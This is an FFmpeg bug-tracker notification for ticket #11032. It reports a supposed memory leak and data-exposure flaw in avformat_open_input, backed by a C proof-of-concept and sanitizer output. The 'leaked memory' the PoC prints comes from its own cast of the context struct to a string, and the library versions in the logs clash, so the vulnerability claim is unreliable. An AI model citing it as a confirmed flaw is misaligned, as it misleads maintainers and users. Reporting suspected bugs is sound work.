[FFmpeg-trac] #11032(avformat:new): Memory Leak Vulnerability in avformat_open_input
FFmpeg
trac at avcodec.org
Sat May 25 20:33:14 EEST 2024
#11032: Memory Leak Vulnerability in avformat_open_input
-------------------------------------+-------------------------------------
Reporter: safa | Type: defect
karakus |
Status: new | Priority: normal
Component: avformat | Version:
| unspecified
Keywords: | Blocked By:
Blocking: | Reproduced by developer: 0
Analyzed by developer: 0 |
-------------------------------------+-------------------------------------
A memory leak vulnerability has been identified in the FFmpeg library,
specifically in the avformat_open_input function. This vulnerability can
lead to the unintended exposure of sensitive data stored in memory. The
issue arises due to improper handling and freeing of allocated memory
within the avformat_open_input and related functions.
{{{
#include <stdint.h>
#include <stddef.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include "libavformat/avformat.h"
#include "libavcodec/avcodec.h"
#include "libavutil/avutil.h"
#include "libavutil/imgutils.h"
void leak_memory_information(const char *filename) {
AVFormatContext *fmt_ctx = avformat_alloc_context();
if (!fmt_ctx) {
fprintf(stderr, "Could not allocate context\n");
return;
}
printf("Attempting to open file: %s\n", filename);
int ret = avformat_open_input(&fmt_ctx, filename, NULL, NULL);
if (ret < 0) {
char err_buf[256];
av_strerror(ret, err_buf, sizeof(err_buf));
fprintf(stderr, "Could not open input file: %s. Error: %s\n",
filename, err_buf);
avformat_free_context(fmt_ctx);
return;
}
if (avformat_find_stream_info(fmt_ctx, NULL) < 0) {
fprintf(stderr, "Could not find stream information\n");
avformat_close_input(&fmt_ctx);
avformat_free_context(fmt_ctx);
return;
}
// Stream bilgilerini al
for (unsigned int i = 0; i < fmt_ctx->nb_streams; i++) {
AVCodecParameters *codecpar = fmt_ctx->streams[i]->codecpar;
const AVCodec *codec = avcodec_find_decoder(codecpar->codec_id);
if (!codec) {
continue;
}
AVCodecContext *codec_ctx = avcodec_alloc_context3(codec);
if (!codec_ctx) {
continue;
}
if (avcodec_parameters_to_context(codec_ctx, codecpar) < 0) {
avcodec_free_context(&codec_ctx);
continue;
}
if (avcodec_open2(codec_ctx, codec, NULL) < 0) {
avcodec_free_context(&codec_ctx);
continue;
}
AVFrame *frame = av_frame_alloc();
AVPacket *packet = av_packet_alloc();
if (!frame || !packet) {
av_frame_free(&frame);
av_packet_free(&packet);
avcodec_free_context(&codec_ctx);
continue;
}
// Paketleri oku ve işleyerek bellek sızıntısını tetikle
while (av_read_frame(fmt_ctx, packet) >= 0) {
if (packet->stream_index == i) {
int ret = avcodec_send_packet(codec_ctx, packet);
if (ret < 0) {
break;
}
ret = avcodec_receive_frame(codec_ctx, frame);
if (ret == AVERROR(EAGAIN) || ret == AVERROR_EOF) {
continue;
} else if (ret < 0) {
break;
}
// Bellek sızıntısına neden olacak işlemler
for (int y = 0; y < frame->height; y++) {
for (int x = 0; x < frame->width; x++) {
int offset = y * frame->linesize[0] + x * 4; //
Örnek olarak 4 byte per pixel (RGBA)
if (offset < frame->linesize[0] * frame->height) {
volatile uint8_t val = frame->data[0][offset];
(void)val;
}
}
}
av_frame_unref(frame);
}
av_packet_unref(packet);
}
av_frame_free(&frame);
av_packet_free(&packet);
avcodec_free_context(&codec_ctx);
}
// Bellek içeriğini sızdırma
char *leaked_memory = (char *)malloc(100);
if (leaked_memory) {
snprintf(leaked_memory, 100, "Leaked memory content at %p: %s\n",
fmt_ctx, (char *)fmt_ctx);
printf("%s", leaked_memory);
free(leaked_memory);
}
avformat_close_input(&fmt_ctx);
avformat_free_context(fmt_ctx); // Bu satır bellek sızıntısını önlemek
için eklenebilir
}
int main(int argc, char *argv[]) {
if (argc != 2) {
fprintf(stderr, "Usage: %s <input file>\n", argv[0]);
return 1;
}
const char *filename = argv[1];
// Bellek ve bilgi sızıntısını tetiklemek için fonksiyonu çağır
leak_memory_information(filename);
return 0;
}
}}}
{{{
Attempting to open file: test.mp4
Leaked memory content at 0x5ae0d4e34080: ��FH�|
}}}
{{{
==3878783==ERROR: LeakSanitizer: detected memory leaks
Direct leak of 48 byte(s) in 2 object(s) allocated from:
#0 0x5e23f8521e07 in posix_memalign
(/home/sazak/fuzz_project/ffmpeg-7.0/use_after_fuzz/memleak_test/memor_sanitize+0xa1e07)
(BuildId: 07d05b4f8da1d513c1a0b32d7f7abdeaf6de5ecc)
#1 0x73665d2419e4 in av_malloc (/lib/x86_64-linux-
gnu/libavutil.so.56+0x419e4) (BuildId:
abc6b699a880017e212d717fb86a1c6ea0e022e8)
Indirect leak of 9467 byte(s) in 4 object(s) allocated from:
#0 0x5e23f8521e07 in posix_memalign
(/home/sazak/fuzz_project/ffmpeg-7.0/use_after_fuzz/memleak_test/memor_sanitize+0xa1e07)
(BuildId: 07d05b4f8da1d513c1a0b32d7f7abdeaf6de5ecc)
#1 0x73665d2419e4 in av_malloc (/lib/x86_64-linux-
gnu/libavutil.so.56+0x419e4) (BuildId:
abc6b699a880017e212d717fb86a1c6ea0e022e8)
SUMMARY: AddressSanitizer: 9515 byte(s) leaked in 6 allocation(s).
}}}
Patches should be submitted to the ffmpeg-devel mailing list and not this
bug tracker.
--
Ticket URL: <https://trac.ffmpeg.org/ticket/11032>
FFmpeg <https://ffmpeg.org>
FFmpeg issue tracker
More information about the FFmpeg-trac
mailing list